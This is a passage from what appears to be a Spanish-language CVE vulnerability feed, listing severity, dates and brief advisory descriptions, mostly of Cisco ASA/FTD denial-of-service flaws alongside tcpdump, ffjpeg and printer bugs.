    Cisco Adaptive Security Appliances (ASA) los dispositivos con v7.x de software antes de v7.2(5.10) v8.0, antes de v8.0(5.28), v8.1 y v8.2 antes de v8.2(5.35), v8.3 antes de v8.3(2.34), v8.4 antes de v8.4(4.11), v8.6 antes de v8.6(1.10), y v8.7 antes de v8.7(1.3), y Cisco Firewall Services Module (FWSM) software v3.1 y v3.2 antes de v3.2(24.1) y v4.0 y v401 antes de v4.1(11.1), permite a atacantes remotos provocar una denegación de servicio (recarga de dispositivo) a través de un elaborado IKEv1 mensaje, también conocido como Bug ID CSCub85692 y CSCud20267.
  • CVE-2013-3458
    Severidad: ALTA
    Fecha de publicación: 08/09/2013
    Fecha de última actualización: 15/08/2023
    Los dispositivos Cisco Adaptive Security Appliances (ASA), cuando se utiliza SMP, no procesan correctamente certificados X.509, lo cual permite a atacantes remotos provocar una denegación de servicio (caída del dispositivo) a través de un volumen grande de tráfico SSL o TLS. Aka Bug ID CSCuh19462.
  • CVE-2013-5542
    Severidad: ALTA
    Fecha de publicación: 21/10/2013
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliance (ASA) Software 8.4 antes de 8.4 (7.2) 8.7 antes de 8.7 (1.8) 9.0 antes de 9.0 (3.6) y 9.1 antes de 9.1 (2.8) permite a atacantes remotos provocar una denegación de servicio (interrupción de sesión de firewall o la recarga del dispositivo) a través de paquetes ICMP artesanales, también conocido como Bug ID CSCui77398.
  • CVE-2013-5568
    Severidad: ALTA
    Fecha de publicación: 13/11/2013
    Fecha de última actualización: 15/08/2023
    La implementación auto-update en Cisco Adaptive Security Appliance (ASA) Software 9.0.3.6 y anteriores versiones permite a atacantes remotos provocar una denegación de servicio (reinicio del dispositivo) a través de datos de actualización manipulados, también conocido como Bug ID CSCui33308.
  • CVE-2013-5560
    Severidad: MEDIA
    Fecha de publicación: 13/11/2013
    Fecha de última actualización: 15/08/2023
    La implementación IPv6 en Cisco Adaptive Security Appliance (ASA) Software 9.1.3 y anteriores versiones, cuando NAT64 o NAT66 están activados, no procesan adecuadamente reglas NAT, lo que permite a atacantes remotos provocar una denegación de servicio (reinicio del dispositivo) a través de paquetes manipulados, también conocido como Bug ID CSCue34342.
  • CVE-2013-6682
    Severidad: MEDIA
    Fecha de publicación: 13/11/2013
    Fecha de última actualización: 15/08/2023
    La implementación phone-proxy en Cisco Adaptive Security Appliance (ASA) Software 9.0.3.6 y anteriores versiones no valida adecuadamente certificados X.509, lo que permite a atacantes remotos provocar una denegación de servicio (corrupción de connection-database) a través de una entrada inválida, también conocido como Bug ID CSCui33299.
  • CVE-2015-4238
    Severidad: MEDIA
    Fecha de publicación: 02/07/2015
    Fecha de última actualización: 15/08/2023
    La implementación SNMP en Cisco Adaptive Security Appliance (ASA) Software 8.4(7) y 8.6(1.2) permite a usuarios remotos autenticados causar una denegación de servicio (recarga de dispositivo) mediante el envío de muchas solicitudes SNMP durante un momento de mucho trafico de red, también conocido como Bug ID CSCul02601.
  • CVE-2015-6379
    Severidad: MEDIA
    Fecha de publicación: 25/11/2015
    Fecha de última actualización: 15/08/2023
    El parser XML en la interfaz de gestión en Cisco Adaptive Security Appliance (ASA) Software 8.4 permite a usuarios remotos autenticados causar una denegación de servicio (caída de dispositivo) a través de un documento XML manipulado, también conocida como Bug ID CSCut14223.
  • CVE-2018-11206
    Severidad: MEDIA
    Fecha de publicación: 16/05/2018
    Fecha de última actualización: 09/08/2023
    Se ha descubierto una lectura fuera de límites en H5O_fill_new_decode y H5O_fill_old_decode en H5Ofill.c en la biblioteca HDF HDF5 1.10.2. Esto podría permitir que se realice un ataque de denegación de servicio remoto o de divulgación de información.
  • CVE-2019-1697
    Severidad: ALTA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la implementación de la función del Lightweight Directory Access Protocol (LDAP) en el software Cisco Adaptive Security Appliance (ASA) y en el software Firepower Threat Defense (FTD) podría permitir que un atacante remoto no autenticado provoque la recarga de un dispositivo afectado, lo que resulta en una Condición de denegación de servicio (DoS). Las vulnerabilidades se deben al análisis incorrecto de los paquetes LDAP enviados a un dispositivo afectado. Un atacante podría explotar estas vulnerabilidades enviando un paquete LDAP creado, usando Reglas de codificación básicas (BER), para ser procesado por un dispositivo afectado. Una explotación con éxito podría permitir que el atacante haga que el dispositivo afectado se vuelva a cargar, lo que resulta en una condición DoS.
  • CVE-2018-16880
    Severidad: MEDIA
    Fecha de publicación: 29/01/2019
    Fecha de última actualización: 18/07/2023
    Se ha encontrado un error en la función handle_rx() del controlador [vhost_net] en el kernel de Linux. Un invitado virtual malicioso, en condiciones específicas, puede desencadenar una escritura fuera de límites en un bloque kmalloc-8 en un host virtual, lo que podría conducir a una corrupción de la memoria del kernel y al pánico del sistema. Debido a la naturaleza del error, no puede descartarse completamente el escalado de privilegios. Las versiones a partir de la v4.16 son vulnerables.
  • CVE-2018-20982
    Severidad: MEDIA
    Fecha de publicación: 22/08/2019
    Fecha de última actualización: 07/08/2023
    El plugin media-library-assistant versiones anteriores a 2.74 para WordPress, presenta una vulnerabilidad de tipo XSS por medio de las pantallas del submenú del administrador auxiliar de Media/Assistant o Settings/Media Library .
  • CVE-2019-1937
    Severidad: ALTA
    Fecha de publicación: 21/08/2019
    Fecha de última actualización: 17/07/2023
    Una vulnerabilidad en la interfaz de administración basada en la web de Cisco Integrated Management Controller (IMC) Supervisor, Cisco UCS Director y Cisco UCS Director Express para Big Data podría permitir que un atacante remoto no autenticado adquiera un token de sesión válido con privilegios de administrador, evitando al usuario autenticación. La vulnerabilidad se debe a una validación insuficiente del encabezado de la solicitud durante el proceso de autenticación. Un atacante podría aprovechar esta vulnerabilidad enviando una serie de solicitudes maliciosas a un dispositivo afectado. Un exploit podría permitir al atacante usar el token de sesión adquirido para obtener acceso completo del administrador al dispositivo afectado.
  • CVE-2019-16350
    Severidad: MEDIA
    Fecha de publicación: 16/09/2019
    Fecha de última actualización: 17/08/2023
    ffjpeg versiones antes del 18-08-2019, presenta una desreferencia del puntero NULL en la función idct2d8x8() en el archivo dct.c.
  • CVE-2019-16351
    Severidad: MEDIA
    Fecha de publicación: 16/09/2019
    Fecha de última actualización: 17/08/2023
    ffjpeg versiones antes del 18-08-2019, presenta una desreferencia del puntero NULL en la función huffman_decode_step() en el archivo huffman.c.
  • CVE-2017-3793
    Severidad: MEDIA
    Fecha de publicación: 20/04/2017
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el normalizador TCP del Cisco Adaptive Security Appliance (ASA) Software (8.0 en versiones hasta 8.7 y 9.0 en versiones hasta 9.6) y del Cisco Firepower Threat Defense (FTD) Software podría permitir a un atacante remoto no autenticado provocar que Cisco ASA y FTD dejen caer cualquier tráfico entrante adicional en todas las interfaces, dando como resultado una condición de denegación de servicio (DoS). La vulnerabilidad se debe a una limitación impropia de la cola TCP global fuera de orden para tamaños de bloque específicos. Un atacante podría explotar esta vulnerabilidad enviando un gran número de conexiones TCP únicas permitidas con segmentos fuera de orden. Un exploit podría permitir al atacante agotar los bloques disponibles en la cola TCP global fuera de orden, provocando la caída de cualquier tráfico entrante adicional en todas las interfaces y resultando en una condición DoS. Cisco Bug IDs: CSCvb46321.
  • CVE-2017-3867
    Severidad: MEDIA
    Fecha de publicación: 17/03/2017
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la implementación de BFD (Border Forwarding Detection) del software Cisco Adaptive Security Appliance (ASA) de Border Gateway Protocol (BGP) podría permitir a un atacante remoto no autenticado omitir la lista de control de acceso (ACL) para tráfico TCP y UDP específico. Más información: CSCvc79842 CSCvc79846 CSCvc79855 CSCvc79873 CSCvc79882 CSCvc79891. Lanzamientos afectados conocidos: 11.1.2.
  • CVE-2017-5698
    Severidad: MEDIA
    Fecha de publicación: 05/09/2017
    Fecha de última actualización: 17/08/2023
    El sistema anti-rollback de Intel Active Management Technology, Intel Standard Manageability e Intel Small Business Technology en sus versiones 11.0.25.3001 y 11.0.26.3000 no evita que se actualice el firmware a la versión 11.6.x.1xxx, la cual es vulnerable a CVE-2017-5689. Esto puede llevarlo a cabo un usuario local con privilegios de administrador.
  • CVE-2017-6607
    Severidad: MEDIA
    Fecha de publicación: 20/04/2017
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el código DNS de Cisco ASA Software podría permitir a un atacante remoto no autenticado hacer que un dispositivo afectado recargue o corrompa la información presente en la caché DNS local del dispositivo. La vulnerabilidad se debe a una falla en el manejo de los mensajes de respuesta DNS. Un atacante podría explotar esta vulnerabilidad al activar una solicitud DNS desde el software Cisco ASA y responder con una respuesta diseñada. Una explotación exitosa podría provocar que el dispositivo se volviera a cargar, dando como resultado una denegación de servicio (DoS) o corrupción de la información de caché DNS local. Nota: Sólo se puede utilizar el tráfico dirigido al dispositivo afectado para explotar esta vulnerabilidad. Esta vulnerabilidad afecta al software Cisco ASA configurado en modo de firewall enrutado o transparente y en modo de contexto único o múltiple. Esta vulnerabilidad puede ser provocada por el tráfico IPv4 e IPv6. Esta vulnerabilidad afecta al Cisco ASA Software que se ejecuta en los siguientes productos: Cisco ASA 1000V Cloud Firewall, Cisco ASA 5500 Series Adaptive Security Appliances, Cisco ASA 5500-X Series Next-Generation Firewalls, Cisco ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Cisco Adaptive Security Virtual Appliance (ASAv), Cisco Firepower 9300 ASA Security Module, Cisco ISA 3000 Industrial Security Appliance. Versiones fijas: 9.1(7.12) 9.2(4.18) 9.4(3.12) 9.5(3.2) 9.6(2.2). Cisco Bug IDs: CSCvb40898.
  • CVE-2017-6608
    Severidad: ALTA
    Fecha de publicación: 20/04/2017
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en los códigos Secure Sockets Layer (SSL) y Transport Layer Security (TLS) de Cisco ASA Software podría permitir a un atacante remoto no autenticado provocar una recarga del sistema afectado. La vulnerabilidad se debe a un análisis incorrecto de los paquetes SSL o TLS manipulados. Un atacante podría explotar esta vulnerabilidad enviando un paquete manipulado al sistema afectado. Nota: Sólo se puede utilizar el tráfico dirigido al sistema afectado para explotar esta vulnerabilidad. Esta vulnerabilidad afecta a los sistemas configurados en modo de firewall enrutado y transparente y en modo de contexto único o múltiple. Esta vulnerabilidad puede ser provocada por el tráfico IPv4 e IPv6. Se necesita una sesión SSL o TLS válida para aprovechar esta vulnerabilidad. Esta vulnerabilidad afecta al Cisco ASA Software que se ejecuta en los siguientes productos: Cisco ASA 1000V Cloud Firewall, Cisco ASA 5500 Series Adaptive Security Appliances, Cisco ASA 5500-X Series Next-Generation Firewalls, Cisco ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Cisco Adaptive Security Virtual Appliance (ASAv), Cisco Firepower 9300 ASA Security Module, Cisco ISA 3000 Industrial Security Appliance. Versiones fijadas: 8.4(7.31) 9.0(4.39) 9.1(7) 9.2(4.6) 9.3(3.8) 9.4(2) 9.5(2). Cisco Bug IDs: CSCuv48243.
  • CVE-2017-6609
    Severidad: MEDIA
    Fecha de publicación: 20/04/2017
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el código IPsec de Cisco ASA Software podría permitir a un atacante remoto autenticado provocar una recarga del sistema afectado. La vulnerabilidad se debe al análisis incorrecto de paquetes IPsec malformados. Un atacante podría explotar esta vulnerabilidad enviando paquetes IPsec malformados al sistema afectado. Nota: Sólo se puede utilizar el tráfico dirigido al sistema afectado para explotar esta vulnerabilidad. Esta vulnerabilidad afecta a los sistemas configurados sólo en el modo enrutado de firewall y en modo de contexto único o múltiple. Esta vulnerabilidad puede ser provocada por el tráfico IPv4 e IPv6. Un atacante necesita establecer un túnel IPsec válido antes de explotar esta vulnerabilidad. Esta vulnerabilidad afecta al software Cisco ASA que se ejecuta en los siguientes productos: Cisco ASA 1000V Cloud Firewall, Cisco ASA 5500 Series Adaptive Security Appliances, Cisco ASA 5500-X Series Next-Generation Firewalls, Cisco ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Cisco Adaptive Security Virtual Appliance (ASAv), Cisco Firepower 9300 ASA Security Module, Cisco ISA 3000 Industrial Security Appliance. Versiones fijadas: 9.1(7.8) 9.2(4.15) 9.4(4) 9.5(3.2) 9.6(2). Cisco Bug IDs: CSCun16158.
  • CVE-2017-6610
    Severidad: MEDIA
    Fecha de publicación: 20/04/2017
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el código de Internet Key Exchange Version 1 (IKEv1) XAUTH de Cisco ASA Software podría permitir a un atacante remoto autenticado provocar una recarga de un sistema afectado. La vulnerabilidad se debe a una validación insuficiente de los parámetros IKEv1 XAUTH aprobados durante una negociación IKEv1. Un atacante podría explotar esta vulnerabilidad enviando parámetros manipulados. Nota: Sólo se puede utilizar el tráfico dirigido al sistema afectado para explotar esta vulnerabilidad. Esta vulnerabilidad sólo afecta a los sistemas configurados en el modo de firewall enrutado y en modo de contexto único o múltiple. Esta vulnerabilidad puede ser desencadenada por el tráfico IPv4 o IPv6. Se necesita establecer una IKEv1 Phase 1 válida para explotar esta vulnerabilidad, lo que significa que un atacante necesitaría tener conocimiento de una clave precompartida o tener un certificado válido para la autenticación de fase 1. Esta vulnerabilidad afecta al software Cisco ASA que se ejecuta en los siguientes productos: Cisco ASA 1000V Cloud Firewall, Cisco ASA 5500 Series Adaptive Security Appliances, Cisco ASA 5500-X Series Next-Generation Firewalls, Cisco ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Cisco Adaptive Security Virtual Appliance (ASAv), Cisco ASA for Firepower 9300 Series, Cisco ISA 3000 Industrial Security Appliance. Versiones fijas: 9.1(7.7) 9.2(4.11) 9.4(4) 9.5(3) 9.6(1.5). Cisco Bug IDs: CSCuz11685.
  • CVE-2017-6679
    Severidad: MEDIA
    Fecha de publicación: 01/12/2017
    Fecha de última actualización: 17/08/2023
    Cisco Umbrella Virtual Appliance en sus versiones 2.0.3 y anteriores contenían un túnel de soporte remoto cifrado sin documentar (SSH) que se iniciaba automáticamente desde la máquina del cliente a los hubs SSH de Cisco en los CPD de Umbrella. Estos túneles se utilizaban en principio para proporcionar soporte remoto y permitían al personal autorizado/autenticado del equipo de Cisco Umbrella para que accediesen a la máquina remotamente y obtuvieses el control total sin la aprobación explícita del cliente. Para resolver esta vulnerabilidad, la versión 2.1.0 de Umbrella Virtual Appliance ahora necesita la aprobación explícita del cliente antes de que se pueda establecer un túnel SSH desde la máquina virtual al servidor destino de Cisco.
  • CVE-2020-5510
    Severidad: ALTA
    Fecha de publicación: 08/01/2020
    Fecha de última actualización: 31/07/2023
    PHPGurukul Hostel Management System versión v2.0, permite una inyección SQL por medio del parámetro id en el archivo full-profile.php.
  • CVE-2018-14462
    Severidad: MEDIA
    Fecha de publicación: 03/10/2019
    Fecha de última actualización: 16/08/2023
    El analizador ICMP en tcpdump versiones anteriores a 4.9.3, presenta una lectura excesiva del búfer en print-icmp.c:icmp_print().
  • CVE-2018-14465
    Severidad: MEDIA
    Fecha de publicación: 03/10/2019
    Fecha de última actualización: 16/08/2023
    El analizador RSVP en tcpdump versiones anteriores a 4.9.3, presenta una lectura excesiva del búfer en print-rsvp.c:rsvp_obj_print().
  • CVE-2018-14468
    Severidad: MEDIA
    Fecha de publicación: 03/10/2019
    Fecha de última actualización: 16/08/2023
    El analizador FRF.16 en tcpdump versiones anteriores a 4.9.3, presenta una lectura excesiva del búfer en print-fr.c:mfr_print().
  • CVE-2018-14469
    Severidad: MEDIA
    Fecha de publicación: 03/10/2019
    Fecha de última actualización: 16/08/2023
    El analizador IKEv1 en tcpdump versiones anteriores a 4.9.3, presenta una lectura excesiva del búfer en print-isakmp.c:ikev1_n_print().
  • CVE-2018-14879
    Severidad: MEDIA
    Fecha de publicación: 03/10/2019
    Fecha de última actualización: 16/08/2023
    El analizador de argumentos de la línea de comandos en tcpdump versiones anteriores a 4.9.3, presenta un desbordamiento de búfer en tcpdump.c:get_next_file().
  • CVE-2018-14880
    Severidad: MEDIA
    Fecha de publicación: 03/10/2019
    Fecha de última actualización: 16/08/2023
    El analizador OSPFv3 en tcpdump versiones anteriores a 4.9.3, presenta una lectura excesiva del búfer en la función print-ospf6.c:ospf6_print_lshdr().
  • CVE-2018-14882
    Severidad: MEDIA
    Fecha de publicación: 03/10/2019
    Fecha de última actualización: 16/08/2023
    El analizador ICMPv6 en tcpdump versiones anteriores a 4.9.3, presenta una lectura excesiva del búfer en el archivo print-icmp6.c.
  • CVE-2018-16229
    Severidad: MEDIA
    Fecha de publicación: 03/10/2019
    Fecha de última actualización: 16/08/2023
    El analizador DCCP en tcpdump versiones anteriores a 4.9.3, presenta una lectura excesiva del búfer en print-dccp.c:dccp_print_option().
  • CVE-2020-3167
    Severidad: ALTA
    Fecha de publicación: 26/02/2020
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la CLI de Cisco FXOS Software y Cisco UCS Manager Software, podría permitir a un atacante local autenticado ejecutar comandos arbitrarios en el sistema operativo (SO) subyacente. La vulnerabilidad es debido a una comprobación de entrada insuficiente. Un atacante podría explotar esta vulnerabilidad al incluir argumentos diseñados en comandos específicos. Una explotación con éxito podría permitir al atacante ejecutar comandos arbitrarios en el sistema operativo subyacente con los privilegios del usuario actualmente conectado para todas las plataformas afectadas, excluyendo Cisco UCS 6400 Series Fabric Interconnects. En Cisco UCS 6400 Series Fabric Interconnects, los comandos inyectados son ejecutados con privilegios root.
  • CVE-2020-3166
    Severidad: MEDIA
    Fecha de publicación: 26/02/2020
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la CLI de Cisco FXOS Software, podría permitir a un atacante local autenticado leer o escribir archivos arbitrarios en el sistema operativo (SO) subyacente. La vulnerabilidad es debido a una comprobación de entrada insuficiente. Un atacante podría explotar esta vulnerabilidad al incluir argumentos diseñados en un comando de la CLI específico. Una explotación con éxito podría permitir a un atacante leer o escribir en archivos arbitrarios en el OS subyacente.
  • CVE-2019-13192
    Severidad: ALTA
    Fecha de publicación: 13/03/2020
    Fecha de última actualización: 16/08/2023
    Algunas impresoras Brother (tal y como la HL-L8360CDW versión v1.20), fueron afectadas por una vulnerabilidad de desbordamiento del búfer de la pila ya que el servicio IPP no analizó los nombres de los atributos apropiadamente. Esto permitiría a un atacante ejecutar código arbitrario en el dispositivo.
  • CVE-2019-13193
    Severidad: ALTA
    Fecha de publicación: 13/03/2020
    Fecha de última actualización: 16/08/2023
    Algunas impresoras Brother (tal y como la HL-L8360CDW versión v1.20), fueron afectadas por una vulnerabilidad de desbordamiento del búfer de la pila, ya que el servidor web no analizó el valor de la cookie apropiadamente. Esto permitiría a un atacante ejecutar código arbitrario en el dispositivo.
  • CVE-2020-11731
    Severidad: MEDIA
    Fecha de publicación: 13/04/2020
    Fecha de última actualización: 07/08/2023
    El plugin Media Library Assistant versiones anteriores a 2.82 para Wordpress, sufre de múltiples vulnerabilidades de tipo XSS en todas las pestañas de Settings/Media de Library Assistant, que permite a usuarios autenticados remotos ejecutar JavaScript arbitrario.
  • Vulnerabilidad en la implementación de Open Shortest Path First (OSPF) del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3298)
    Severidad: ALTA
    Fecha de publicación: 06/05/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la implementación de Open Shortest Path First (OSPF) del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar el reinicio de un dispositivo afectado, resultando en una condición de denegación de servicio (DoS). La vulnerabilidad es debido a mecanismos de protección de memoria inapropiados mientras se procesan determinados paquetes OSPF. Un atacante podría explotar esta vulnerabilidad mediante el envío de una serie de paquetes OSPF malformados en un corta trama de tiempo hacia un dispositivo afectado. Una explotación con éxito podría permitir a un atacante causar un reinicio del dispositivo afectado, resultando en una condición DoS para el tráfico del cliente que atraviesa el dispositivo.
  • Vulnerabilidad en la funcionalidad Internet Key Exchange (IKEv1) del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3303)
    Severidad: ALTA
    Fecha de publicación: 06/05/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la funcionalidad Internet Key Exchange versión 1 (IKEv1) del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS). La vulnerabilidad es debido a una administración inapropiada de la memoria del sistema. Un atacante podría explotar esta vulnerabilidad mediante el envío de tráfico malicioso IKEv1 hacia un dispositivo afectado. Una explotación con éxito podría permitir a un atacante causar una condición DoS sobre el dispositivo afectado.
  • Vulnerabilidad en la funcionalidad de inspección de Media Gateway Control Protocol (MGCP) del Cisco Adaptive Security Appliance (ASA) Software y el Firepower Threat Defense (FTD) Software (CVE-2020-3254)
    Severidad: ALTA
    Fecha de publicación: 06/05/2020
    Fecha de última actualización: 16/08/2023
    Múltiples vulnerabilidades en la funcionalidad de inspección de Media Gateway Control Protocol (MGCP) del Cisco Adaptive Security Appliance (ASA) Software y el Firepower Threat Defense (FTD) Software, podrían permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS) sobre un dispositivo afectado. Las vulnerabilidades son debido a una administración ineficiente de la memoria. Un atacante podría explotar estas vulnerabilidades mediante el envío de paquetes MGCP diseñados a través de un dispositivo afectado. Una explotación podría permitir a un atacante causar el agotamiento de la memoria, resultando en un reinicio de un dispositivo afectado, causando una condición DoS para el tráfico que atraviesa el dispositivo.
  • Vulnerabilidad en las conexiones entrantes SSL/TLS en el manejador de Secure Sockets Layer (SSL)/Transport Layer Security (TLS) del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3196)
    Severidad: MEDIA
    Fecha de publicación: 06/05/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el manejador de Secure Sockets Layer (SSL)/Transport Layer Security (TLS) del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado agotar los recursos de la memoria sobre el dispositivo afectado, conllevando a una condición de denegación de servicio (DoS). La vulnerabilidad es debido a una administración de recursos inapropiada para las conexiones entrantes SSL/TLS. Un atacante podría explotar esta vulnerabilidad al establecer múltiples conexiones SSL/TLS con condiciones específicas para el dispositivo afectado. Una explotación con éxito podría permitir al atacante agotar la memoria en el dispositivo afectado, causando que el dispositivo deje de aceptar nuevas conexiones SSL/TLS y resultando en una condición DoS para los servicios en el dispositivo que procesa el tráfico SSL/TLS. Es requerida una intervención manual para recuperar un dispositivo afectado.
  • Vulnerabilidad en el KDC en la funcionalidad de autenticación de Kerberos del Cisco Adaptive Security Appliance (ASA) Software (CVE-2020-3125)
    Severidad: MEDIA
    Fecha de publicación: 06/05/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la funcionalidad de autenticación de Kerberos del Cisco Adaptive Security Appliance (ASA) Software, podría permitir a un atacante remoto no autenticado suplantar al centro de distribución de claves (KDC) de Kerberos y omitir la autenticación sobre un dispositivo afectado que esté configurado para realizar la autenticación Kerberos para VPN o acceso local a dispositivos. La vulnerabilidad es debido a una verificación de identidad insuficiente del KDC cuando es recibida una respuesta de autenticación con éxito. Un atacante podría explotar esta vulnerabilidad al suplantar la respuesta del servidor KDC en el dispositivo ASA. Esta respuesta maliciosa no habría sido autenticada por el KDC. Un ataque con éxito podría permitir a un atacante omitir la autenticación de Kerberos.
  • Vulnerabilidad en la implementación del módulo Border Gateway Protocol (BGP) en el Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3305)
    Severidad: ALTA
    Fecha de publicación: 06/05/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la implementación del módulo Border Gateway Protocol (BGP) en el Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS). La vulnerabilidad es debido al procesamiento incorrecto de determinados paquetes BGP. Un atacante podría explotar esta vulnerabilidad mediante el envío de un paquete BGP diseñado. Una explotación con éxito podría permitir a un atacante causar una condición DoS sobre el dispositivo afectado.
  • Vulnerabilidad en el módulo DHCP del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3306)
    Severidad: ALTA
    Fecha de publicación: 06/05/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el módulo DHCP del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS) sobre el dispositivo afectado. La vulnerabilidad es debido al procesamiento incorrecto de determinados paquetes DHCP. Un atacante podría explotar esta vulnerabilidad mediante el envío de un paquete DHCP diseñado hacia el dispositivo afectado. Una explotación con éxito podría permitir a un atacante causar una condición DoS sobre el dispositivo afectado.
  • Vulnerabilidad en el procesamiento de paquetes ARP del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software para el Cisco Firepower 2100 Series Security Appliances (CVE-2020-3334)
    Severidad: MEDIA
    Fecha de publicación: 06/05/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el procesamiento de paquetes ARP del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software para el Cisco Firepower 2100 Series Security Appliances, podría permitir a un atacante adyacente no autenticado causar que un dispositivo afectado se sobrecargue, resultando en una condición de denegación de servicio (DoS) sobre un dispositivo afectado. La vulnerabilidad es debido a un procesamiento inapropiado de los paquetes ARP recibidos por la interfaz de administración de un dispositivo afectado. Un atacante podría explotar esta vulnerabilidad mediante el envío de una serie de paquetes ARP de unidifusión en un corta trama de tiempo que llegaría a la interfaz de administración de un dispositivo afectado. Una explotación con éxito podría permitir a un atacante consumir recursos sobre un dispositivo afectado, lo que impediría que el dispositivo envíe mensajes de mantenimiento internos del sistema y eventualmente causar que el dispositivo se sobrecargue, resultando en una condición de denegación de servicio (DoS).
  • CVE-2020-13440
    Severidad: MEDIA
    Fecha de publicación: 24/05/2020
    Fecha de última actualización: 17/08/2023
    ffjpeg hasta el 24-02-2020, presenta una escritura no válida en la función bmp_load en el archivo bmp.c.
  • CVE-2020-13439
    Severidad: MEDIA
    Fecha de publicación: 24/05/2020
    Fecha de última actualización: 17/08/2023
    ffjpeg hasta el 24-02-2020, presenta una lectura excesiva de búfer en la región heap de la memoria en la función jfif_decode en el archivo jfif.c.
  • CVE-2020-13438
    Severidad: MEDIA
    Fecha de publicación: 24/05/2020
    Fecha de última actualización: 17/08/2023
    ffjpeg hasta el 24-02-2020, presenta una lectura no válida en la función jfif_encode en el archivo jfif.c.
  • CVE-2020-15470
    Severidad: MEDIA
    Fecha de publicación: 01/07/2020
    Fecha de última actualización: 17/08/2023
    ffjpeg versiones hasta 24-02-2020, presenta un desbordamiento de búfer en la región heap de la memoria en la función jfif_decode en el archivo jfif.c
  • CVE-2018-16781
    Severidad: MEDIA
    Fecha de publicación: 10/09/2018
    Fecha de última actualización: 17/08/2023
    ffjpeg.dll en ffjpeg en versiones anteriores a la 2018-08-22 permite que atacantes remotos provoquen una denegación de servicio (señal FPE) mediante un archivo JPEG progresivo que carece de una tabla AC Huffman.
  • CVE-2011-3302
    Severidad: ALTA
    Fecha de publicación: 06/10/2011
    Fecha de última actualización: 15/08/2023
    Dispositivos de las series Cisco Adaptive Security Appliances (ASA ) 5500, y el módulo de ASA en dispositivos de la serie Cisco Catalyst 6500, con el software v7.0 anteriores a v7.0(8.13), v7.1 y v7.2 anteriores a v7.2(5.4), v8.0 anteriores a v8.0(5.25), v8.1 y v8.2 anteriores a v8.2(5.11), v8.3 anteriores a v8.3(2.23), v8.4 anteriores a v8.4(2.6), y v8.5 anteriores a v8.5(1.1) y Cisco Firewall Services Module (también conocido como FWSM) v3.1 anteriores a v3.1(21), v3.2 anteriores a v3.2(22), v4.0 anteriores a v4.0(16), y v4.1 anteriores a v4.1(7) permite a atacantes remotos causar una denegación de servicio (reinicio del dispositivo) a través del tráfico SunRPC manipulado, también conocido como Bug IDs CSCto92398 y CSCtq09989.
  • CVE-2011-3303
    Severidad: ALTA
    Fecha de publicación: 06/10/2011
    Fecha de última actualización: 15/08/2023
    Dispositivos de la serie Cisco Adaptive Security Appliances (ASA) 5500, y el módulo ASA Services en dispositivos Cisco Catalyst 6500, con software v7.0 anteriores a v7.0(8.13), v7.1 y v7.2 anteriores a v7.2(5.4), v8.0 anteriores a v8.0(5.25), v8.1 anteriores a v8.1(2.50), v8.2 anteriores a v8.2(5.6), v8.3 anteriores a v8.3(2.23), v8.4 anteriores a v8.4(2.7), y v8.5 anteriores a v8.5(1.1) y Cisco Firewall Services Module (también conocido como FWSM) v3.1 anteriores a v3.1(21), v3.2 anteriores a v3.2(22), v4.0 anteriores a v4.0(16), y v4.1 anteriores a v4.1(7) permite a atacantes remotos a provocar una denegación de servicio (reinicio de dispositivo) a través de tráfico ILS manipulado, también conocido como Bug IDs CSCtq57697 y CSCtq57802.
  • CVE-2011-3304
    Severidad: ALTA
    Fecha de publicación: 06/10/2011
    Fecha de última actualización: 15/08/2023
